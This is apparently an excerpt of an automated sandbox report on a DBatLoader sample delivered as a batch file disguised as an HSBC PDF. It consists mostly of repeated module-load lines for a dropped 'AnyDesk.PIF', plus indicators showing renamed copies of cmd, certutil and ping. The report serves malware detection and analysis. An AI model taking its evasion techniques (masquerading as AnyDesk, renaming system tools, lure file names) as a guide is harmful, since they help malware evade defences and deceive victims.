              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: USD470900_COPY_800BLHSBC882001.PDF.batStatic file information: File size 3383372 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A8D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A5D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1495264734.0000000002286000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1398569202.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1403371619.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1422354773.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1415961649.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1424821170.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1423749785.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1429459275.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1425860533.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1478304743.0000000005320000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
              Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000011.00000003.1483371503.0000000005120000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.17.dr
              Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1398569202.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1403371619.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1422354773.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1415961649.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1424821170.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1423749785.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1429459275.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1425860533.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000010.00000003.1478304743.0000000005320000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.16.dr, alpha.exe.3.dr
              Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A8D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1497237334.0000000002AF2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1517170522.0000000020A5D000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427109635.0000000002AF6000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1481965290.0000000021982000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1481965290.00000000219B1000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1495264734.0000000002286000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ping.pdb source: esentutl.exe, 00000011.00000003.1483371503.0000000005120000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.17.dr
              Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr

              Data Obfuscation

              barindex
              Yara detected DBatLoader
              Source: Yara matchFile source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
